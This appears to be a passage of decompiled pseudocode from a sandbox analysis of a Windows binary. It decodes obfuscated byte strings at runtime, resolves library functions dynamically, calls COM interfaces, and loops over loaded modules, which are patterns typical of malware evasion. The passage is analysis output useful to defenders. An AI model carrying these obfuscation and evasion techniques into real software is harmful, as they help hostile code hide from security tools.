                                                                                                                                                                                                      						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
                                                                                                                                                                                                      						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
                                                                                                                                                                                                      						_t561 = _t560 + 4;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
                                                                                                                                                                                                      						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
                                                                                                                                                                                                      						_t527 =  *((intOrPtr*)(_t561 + 0x38));
                                                                                                                                                                                                      						_t192 = _t537 + 4; // 0x4
                                                                                                                                                                                                      						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
                                                                                                                                                                                                      						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
                                                                                                                                                                                                      						_t528 = _t527 + 0xe;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x34)) = 0xce;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x35)) = 0x27;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x36)) = 0x9c;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x37)) = 0x1a;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x38)) = 0x95;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x39)) = 0x21;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x3a)) = 0x2e;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x3b)) = 0xd;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x3c)) = 0xdb;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x3d)) = 0x29;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x3e)) = 0x57;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x3f)) = 0x56;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x40)) = 0xf8;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x41)) = 0x98;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x42)) = 0x5b;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x43)) = 0xf4;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x44)) = 0xb5;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x45)) = 0x87;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x46)) = 0x7b;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x47)) = 0xf;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x48)) = 0xf4;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x49)) = 0x76;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x4a)) = 0xb9;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x4b)) = 0x34;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x4c)) = 0xbf;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x4d)) = 0x1e;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x4e)) = 0xe7;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x4f)) = 0x78;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x50)) = 0x98;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x51)) = 0xe9;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x52)) = 0x6f;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x53)) = 0xb4;
                                                                                                                                                                                                      						 *((char*)(_t561 + 0x54)) = 0;
                                                                                                                                                                                                      						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
                                                                                                                                                                                                      						_t562 = _t561 + 0x24;
                                                                                                                                                                                                      						_t365 = LoadLibraryA(_t364); // executed
                                                                                                                                                                                                      						_t538 = _t365;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x10)) = 0xe0;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x11)) = 0x18;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x12)) = 0xad;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x13)) = 0x36;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x14)) = 0x95;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x15)) = 0x21;
                                                                                                                                                                                                      						_t451 = _t562 + 0x134;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x1e)) = 0x2a;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x1f)) = 0x57;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x20)) = 0xda;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x21)) = 0xc;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x22)) = 0x55;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x23)) = 0x25;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x24)) = 0x8c;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x25)) = 0xf9;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x26)) = 0x35;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x27)) = 0x97;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x28)) = 0xd0;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x29)) = 0x87;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x2a)) = 0x7b;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x2b)) = 0xf;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x2c)) = 0xf4;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x2d)) = 0x76;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x2e)) = 0xb9;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x2f)) = 0x34;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x30)) = 0xbf;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x31)) = 0x1e;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x32)) = 0xe7;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x33)) = 0x78;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x34)) = 0x98;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x35)) = 0xe9;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x36)) = 0x6f;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x37)) = 0xb4;
                                                                                                                                                                                                      						 *((char*)(_t562 + 0x38)) = 0;
                                                                                                                                                                                                      						_t366 = E00401650(_t562 + 0x14, _t451);
                                                                                                                                                                                                      						_t563 = _t562 + 8;
                                                                                                                                                                                                      						_t367 = GetProcAddress(_t365, _t366);
                                                                                                                                                                                                      						__eflags = _t367;
                                                                                                                                                                                                      						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
                                                                                                                                                                                                      						__eflags = _t452;
                                                                                                                                                                                                      						 *(_t563 + 0x47) = _t452 == 0;
                                                                                                                                                                                                      						 *0x423480 = _t367;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t563 + 0x80)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t563 + 0x84)) = 0;
                                                                                                                                                                                                      						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
                                                                                                                                                                                                      						 *(_t563 + 0x58) = 0;
                                                                                                                                                                                                      						 *(_t563 + 0x54) = 0;
                                                                                                                                                                                                      						__eflags = _t452;
                                                                                                                                                                                                      						if(_t452 != 0) {
                                                                                                                                                                                                      							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
                                                                                                                                                                                                      							__eflags = _t368;
                                                                                                                                                                                                      							if(_t368 >= 0) {
                                                                                                                                                                                                      								__eflags =  *(_t563 + 0x47);
                                                                                                                                                                                                      								if( *(_t563 + 0x47) == 0) {
                                                                                                                                                                                                      									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
                                                                                                                                                                                                      									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
                                                                                                                                                                                                      									_t376 =  *((intOrPtr*)(_t563 + 0x80));
                                                                                                                                                                                                      									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
                                                                                                                                                                                                      									__eflags = _t378;
                                                                                                                                                                                                      									if(_t378 >= 0) {
                                                                                                                                                                                                      										_t381 =  *((intOrPtr*)(_t563 + 0x84));
                                                                                                                                                                                                      										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
                                                                                                                                                                                                      										__eflags = _t383;
                                                                                                                                                                                                      										if(_t383 >= 0) {
                                                                                                                                                                                                      											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
                                                                                                                                                                                                      											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
                                                                                                                                                                                                      											__eflags = _t385;
                                                                                                                                                                                                      											if(_t385 >= 0) {
                                                                                                                                                                                                      												 *((intOrPtr*)(_t563 + 0x38)) = 0;
                                                                                                                                                                                                      												E00401870(_t563 + 0x44, _t552, "_._");
                                                                                                                                                                                                      												_t539 = __imp__#8;
                                                                                                                                                                                                      												 *((intOrPtr*)(_t563 + 0x40)) = 0;
                                                                                                                                                                                                      												 *_t539(_t563 + 0x94);
                                                                                                                                                                                                      												E00401870(_t563 + 0x3c, _t552, "___");
                                                                                                                                                                                                      												 *_t539(_t563 + 0xa4);
                                                                                                                                                                                                      												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
                                                                                                                                                                                                      												_t542 =  *(_t563 + 0x58);
                                                                                                                                                                                                      												__eflags = _t542;
                                                                                                                                                                                                      												if(_t542 == 0) {
                                                                                                                                                                                                      													E0040AD90(0x80004003);
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
                                                                                                                                                                                                      												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
                                                                                                                                                                                                      												 *((intOrPtr*)(_t563 + 0x98)) = 0;
                                                                                                                                                                                                      												__imp__#15(0x11, 1, _t563 + 0x88); // executed
                                                                                                                                                                                                      												_t543 = _t396;
                                                                                                                                                                                                      												 *((intOrPtr*)(_t563 + 0x50)) = 0;
                                                                                                                                                                                                      												__imp__#23(_t543, _t563 + 0x48);
                                                                                                                                                                                                      												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
                                                                                                                                                                                                      												_t564 = _t563 + 0xc;
                                                                                                                                                                                                      												__imp__#24(_t543);
                                                                                                                                                                                                      												_t399 =  *(_t564 + 0x54);
                                                                                                                                                                                                      												__eflags = _t399;
                                                                                                                                                                                                      												if(_t399 == 0) {
                                                                                                                                                                                                      													_t399 = E0040AD90(0x80004003);
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
                                                                                                                                                                                                      												__eflags = _t543;
                                                                                                                                                                                                      												if(_t543 != 0) {
                                                                                                                                                                                                      													__imp__#16(_t543);
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t402 =  *(_t564 + 0x34);
                                                                                                                                                                                                      												__eflags = _t402;
                                                                                                                                                                                                      												if(_t402 == 0) {
                                                                                                                                                                                                      													_t402 = E0040AD90(0x80004003);
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t469 =  *(_t564 + 0x40);
                                                                                                                                                                                                      												_t555 = _t402;
                                                                                                                                                                                                      												__eflags = _t469;
                                                                                                                                                                                                      												if(_t469 == 0) {
                                                                                                                                                                                                      													_t531 = 0;
                                                                                                                                                                                                      													__eflags = 0;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t531 =  *_t469;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
                                                                                                                                                                                                      												__imp__#411(0xc, 0, 0);
                                                                                                                                                                                                      												_t471 =  *(_t564 + 0x3c);
                                                                                                                                                                                                      												__eflags = _t471;
                                                                                                                                                                                                      												if(_t471 == 0) {
                                                                                                                                                                                                      													E0040AD90(0x80004003);
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t405 =  *(_t564 + 0x38);
                                                                                                                                                                                                      												__eflags = _t405;
                                                                                                                                                                                                      												if(_t405 == 0) {
                                                                                                                                                                                                      													_t514 = 0;
                                                                                                                                                                                                      													__eflags = 0;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t514 =  *_t405;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t563 = _t564 - 0x10;
                                                                                                                                                                                                      												_t407 = _t563;
                                                                                                                                                                                                      												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
                                                                                                                                                                                                      												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
                                                                                                                                                                                                      												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
                                                                                                                                                                                                      												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
                                                                                                                                                                                                      												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
                                                                                                                                                                                                      												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
                                                                                                                                                                                                      												_t538 = __imp__#9; // 0x74f3cf00
                                                                                                                                                                                                      												_t538->i(_t563 + 0xa4);
                                                                                                                                                                                                      												E004019A0(_t563 + 0x38);
                                                                                                                                                                                                      												_t538->i(_t563 + 0x94);
                                                                                                                                                                                                      												_t413 =  *(_t563 + 0x3c);
                                                                                                                                                                                                      												__eflags = _t413;
                                                                                                                                                                                                      												if(_t413 != 0) {
                                                                                                                                                                                                      													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												E004019A0(_t563 + 0x40);
                                                                                                                                                                                                      												_t415 =  *(_t563 + 0x34);
                                                                                                                                                                                                      												__eflags = _t415;
                                                                                                                                                                                                      												if(_t415 != 0) {
                                                                                                                                                                                                      													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t379 =  *((intOrPtr*)(_t563 + 0x174));
                                                                                                                                                                                                      									__eflags = _t379 - _t563 + 0x178;
                                                                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                                                                      										_push(_t379);
                                                                                                                                                                                                      										E0040B6B5(0, _t528, _t538, __eflags);
                                                                                                                                                                                                      										_t563 = _t563 + 4;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t369 =  *(_t563 + 0x54);
                                                                                                                                                                                                      							__eflags = _t369;
                                                                                                                                                                                                      							if(_t369 != 0) {
                                                                                                                                                                                                      								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t370 =  *(_t563 + 0x58);
                                                                                                                                                                                                      							__eflags = _t370;
                                                                                                                                                                                                      							if(_t370 != 0) {
                                                                                                                                                                                                      								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L80;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                                                                                                                                                      						_t565 = _t557 + 8;
                                                                                                                                                                                                      						_t547 = _t428;
                                                                                                                                                                                                      						_t520 = _t565 + 0x298;
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							_t429 =  *_t520;
                                                                                                                                                                                                      							if(_t429 !=  *_t547) {
                                                                                                                                                                                                      								break;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							if(_t429 == 0) {
                                                                                                                                                                                                      								L7:
                                                                                                                                                                                                      								_t429 = 0;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t493 =  *((intOrPtr*)(_t520 + 1));
                                                                                                                                                                                                      								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
                                                                                                                                                                                                      									break;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t520 = _t520 + 2;
                                                                                                                                                                                                      									_t547 = _t547 + 2;
                                                                                                                                                                                                      									if(_t493 != 0) {
                                                                                                                                                                                                      										continue;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L7;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							if(_t429 != 0) {
                                                                                                                                                                                                      								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
                                                                                                                                                                                                      								_t557 = _t565 + 8;
                                                                                                                                                                                                      								_t548 = _t431;
                                                                                                                                                                                                      								_t488 = _t557 + 0x298;
                                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                                      									_t432 =  *_t488;
                                                                                                                                                                                                      									__eflags = _t432 -  *_t548;
                                                                                                                                                                                                      									if(_t432 !=  *_t548) {
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									__eflags = _t432;
                                                                                                                                                                                                      									if(_t432 == 0) {
                                                                                                                                                                                                      										L16:
                                                                                                                                                                                                      										_t432 = 0;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t432 =  *((intOrPtr*)(_t488 + 1));
                                                                                                                                                                                                      										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
                                                                                                                                                                                                      										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
                                                                                                                                                                                                      											break;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t488 = _t488 + 2;
                                                                                                                                                                                                      											_t548 = _t548 + 2;
                                                                                                                                                                                                      											__eflags = _t432;
                                                                                                                                                                                                      											if(_t432 != 0) {
                                                                                                                                                                                                      												continue;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												goto L16;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									L18:
                                                                                                                                                                                                      									__eflags = _t432;
                                                                                                                                                                                                      									if(_t432 == 0) {
                                                                                                                                                                                                      										goto L10;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t435 = Module32Next(_t525, _t557 + 0x278);
                                                                                                                                                                                                      										__eflags = _t435;
                                                                                                                                                                                                      										if(_t435 != 0) {
                                                                                                                                                                                                      											do {
                                                                                                                                                                                                      												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                                                                                                                                                      												_t566 = _t557 + 8;
                                                                                                                                                                                                      												_t549 = _t437;
                                                                                                                                                                                                      												_t490 = _t566 + 0x298;
                                                                                                                                                                                                      												while(1) {
                                                                                                                                                                                                      													_t438 =  *_t490;
                                                                                                                                                                                                      													__eflags = _t438 -  *_t549;
                                                                                                                                                                                                      													if(_t438 !=  *_t549) {
                                                                                                                                                                                                      														break;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													__eflags = _t438;
                                                                                                                                                                                                      													if(_t438 == 0) {
                                                                                                                                                                                                      														L26:
                                                                                                                                                                                                      														_t438 = 0;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														_t438 =  *((intOrPtr*)(_t490 + 1));
                                                                                                                                                                                                      														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
                                                                                                                                                                                                      														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
                                                                                                                                                                                                      															break;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t490 = _t490 + 2;
                                                                                                                                                                                                      															_t549 = _t549 + 2;
                                                                                                                                                                                                      															__eflags = _t438;
                                                                                                                                                                                                      															if(_t438 != 0) {
                                                                                                                                                                                                      																continue;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																goto L26;
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													L28:
                                                                                                                                                                                                      													__eflags = _t438;
                                                                                                                                                                                                      													if(_t438 == 0) {
                                                                                                                                                                                                      														goto L10;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
                                                                                                                                                                                                      														_t557 = _t566 + 8;
                                                                                                                                                                                                      														_t550 = _t439;
                                                                                                                                                                                                      														_t492 = _t557 + 0x298;
                                                                                                                                                                                                      														while(1) {
                                                                                                                                                                                                      															_t440 =  *_t492;
                                                                                                                                                                                                      															__eflags = _t440 -  *_t550;
                                                                                                                                                                                                      															if(_t440 !=  *_t550) {
                                                                                                                                                                                                      																break;
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      															__eflags = _t440;
                                                                                                                                                                                                      															if(_t440 == 0) {
                                                                                                                                                                                                      																L34:
                                                                                                                                                                                                      																_t440 = 0;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																_t440 =  *((intOrPtr*)(_t492 + 1));
                                                                                                                                                                                                      																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
                                                                                                                                                                                                      																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
                                                                                                                                                                                                      																	break;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	_t492 = _t492 + 2;
                                                                                                                                                                                                      																	_t550 = _t550 + 2;
                                                                                                                                                                                                      																	__eflags = _t440;
                                                                                                                                                                                                      																	if(_t440 != 0) {
                                                                                                                                                                                                      																		continue;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		goto L34;
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      															L36:
                                                                                                                                                                                                      															__eflags = _t440;
                                                                                                                                                                                                      															if(_t440 == 0) {
                                                                                                                                                                                                      																goto L10;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																goto L37;
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      															goto L81;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														asm("sbb eax, eax");
                                                                                                                                                                                                      														asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                      														goto L36;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													goto L81;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												asm("sbb eax, eax");
                                                                                                                                                                                                      												asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                      												goto L28;
                                                                                                                                                                                                      												L37:
                                                                                                                                                                                                      												_t442 = Module32Next(_t525, _t557 + 0x278);
                                                                                                                                                                                                      												__eflags = _t442;
                                                                                                                                                                                                      											} while (_t442 != 0);
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										goto L38;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L81;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                                                                      								asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                      								goto L18;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								L10:
                                                                                                                                                                                                      								CloseHandle(_t525);
                                                                                                                                                                                                      								return 0;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							goto L81;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						asm("sbb eax, eax");
                                                                                                                                                                                                      						asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L81:
                                                                                                                                                                                                      			}

































































































                                                                                                                                                                                                      0x004019f0
                                                                                                                                                                                                      0x004019f0
                                                                                                                                                                                                      0x004019fd
                                                                                                                                                                                                      0x00401a10
                                                                                                                                                                                                      0x00401a15
                                                                                                                                                                                                      0x00401a1a
                                                                                                                                                                                                      0x00401a1f
                                                                                                                                                                                                      0x00401a24
                                                                                                                                                                                                      0x00401a29
                                                                                                                                                                                                      0x00401a2e
                                                                                                                                                                                                      0x00401a33
                                                                                                                                                                                                      0x00401a38
                                                                                                                                                                                                      0x00401a3d
                                                                                                                                                                                                      0x00401a42
                                                                                                                                                                                                      0x00401a47
                                                                                                                                                                                                      0x00401a4c
                                                                                                                                                                                                      0x00401a51
                                                                                                                                                                                                      0x00401a56
                                                                                                                                                                                                      0x00401a5b
                                                                                                                                                                                                      0x00401a60
                                                                                                                                                                                                      0x00401a65
                                                                                                                                                                                                      0x00401a6a
                                                                                                                                                                                                      0x00401a6f
                                                                                                                                                                                                      0x00401a74
                                                                                                                                                                                                      0x00401a79
                                                                                                                                                                                                      0x00401a7e
                                                                                                                                                                                                      0x00401a83
                                                                                                                                                                                                      0x00401a88
                                                                                                                                                                                                      0x00401a8d
                                                                                                                                                                                                      0x00401a92
                                                                                                                                                                                                      0x00401a97
                                                                                                                                                                                                      0x00401a9c
                                                                                                                                                                                                      0x00401aa1
                                                                                                                                                                                                      0x00401aa6
                                                                                                                                                                                                      0x00401aab
                                                                                                                                                                                                      0x00401ab0
                                                                                                                                                                                                      0x00401ab9
                                                                                                                                                                                                      0x00401aba
                                                                                                                                                                                                      0x00401abf
                                                                                                                                                                                                      0x00401ac7
                                                                                                                                                                                                      0x0040248d
                                                                                                                                                                                                      0x0040248d
                                                                                                                                                                                                      0x00402496
                                                                                                                                                                                                      0x00401acd
                                                                                                                                                                                                      0x00401ad6
                                                                                                                                                                                                      0x00401ae2
                                                                                                                                                                                                      0x00401ae6
                                                                                                                                                                                                      0x00401af1
                                                                                                                                                                                                      0x00401af6
                                                                                                                                                                                                      0x00401afb
                                                                                                                                                                                                      0x00401b00
                                                                                                                                                                                                      0x00401b05
                                                                                                                                                                                                      0x00401b0a
                                                                                                                                                                                                      0x00401b0f
                                                                                                                                                                                                      0x00401b14
                                                                                                                                                                                                      0x00401b19
                                                                                                                                                                                                      0x00401b1e
                                                                                                                                                                                                      0x00401b23
                                                                                                                                                                                                      0x00401b28
                                                                                                                                                                                                      0x00401b2d
                                                                                                                                                                                                      0x00401b32
                                                                                                                                                                                                      0x00401b37
                                                                                                                                                                                                      0x00401b3c
                                                                                                                                                                                                      0x00401b41
                                                                                                                                                                                                      0x00401b46
                                                                                                                                                                                                      0x00401b4b
                                                                                                                                                                                                      0x00401b50
                                                                                                                                                                                                      0x00401b55
                                                                                                                                                                                                      0x00401b5a
                                                                                                                                                                                                      0x00401b5f
                                                                                                                                                                                                      0x00401b64
                                                                                                                                                                                                      0x00401b69
                                                                                                                                                                                                      0x00401b6e
                                                                                                                                                                                                      0x00401b73
                                                                                                                                                                                                      0x00401b78
                                                                                                                                                                                                      0x00401b7d
                                                                                                                                                                                                      0x00401b85
                                                                                                                                                                                                      0x00401b8d
                                                                                                                                                                                                      0x00401b95
                                                                                                                                                                                                      0x00401b9d
                                                                                                                                                                                                      0x00401ba4
                                                                                                                                                                                                      0x00401ba9
                                                                                                                                                                                                      0x00401bae
                                                                                                                                                                                                      0x00401bb3
                                                                                                                                                                                                      0x00401bb8
                                                                                                                                                                                                      0x00401bbd
                                                                                                                                                                                                      0x00401bc2
                                                                                                                                                                                                      0x00401bc7
                                                                                                                                                                                                      0x00401bcc
                                                                                                                                                                                                      0x00401bd1
                                                                                                                                                                                                      0x00401bd6
                                                                                                                                                                                                      0x00401bdb
                                                                                                                                                                                                      0x00401be0
                                                                                                                                                                                                      0x00401be5
                                                                                                                                                                                                      0x00401bea
                                                                                                                                                                                                      0x00401bef
                                                                                                                                                                                                      0x00401bf4
                                                                                                                                                                                                      0x00401bf9
                                                                                                                                                                                                      0x00401bfe
                                                                                                                                                                                                      0x00401c03
                                                                                                                                                                                                      0x00401c08
                                                                                                                                                                                                      0x00401c0d
                                                                                                                                                                                                      0x00401c12
                                                                                                                                                                                                      0x00401c17
                                                                                                                                                                                                      0x00401c1c
                                                                                                                                                                                                      0x00401c21
                                                                                                                                                                                                      0x00401c26
                                                                                                                                                                                                      0x00401c2b
                                                                                                                                                                                                      0x00401c30
                                                                                                                                                                                                      0x00401c35
                                                                                                                                                                                                      0x00401c3a
                                                                                                                                                                                                      0x00401c3f
                                                                                                                                                                                                      0x00401c44
                                                                                                                                                                                                      0x00401c48
                                                                                                                                                                                                      0x00401c4f
                                                                                                                                                                                                      0x00401dc3
                                                                                                                                                                                                      0x00401dc4
                                                                                                                                                                                                      0x00401de0
                                                                                                                                                                                                      0x00401de2
                                                                                                                                                                                                      0x00401de7
                                                                                                                                                                                                      0x00401dec
                                                                                                                                                                                                      0x00401df1
                                                                                                                                                                                                      0x00401df6
                                                                                                                                                                                                      0x00401dfb
                                                                                                                                                                                                      0x00401e00
                                                                                                                                                                                                      0x00401e05
                                                                                                                                                                                                      0x00401e0a
                                                                                                                                                                                                      0x00401e0f
                                                                                                                                                                                                      0x00401e14
                                                                                                                                                                                                      0x00401e19
                                                                                                                                                                                                      0x00401e1e
                                                                                                                                                                                                      0x00401e23
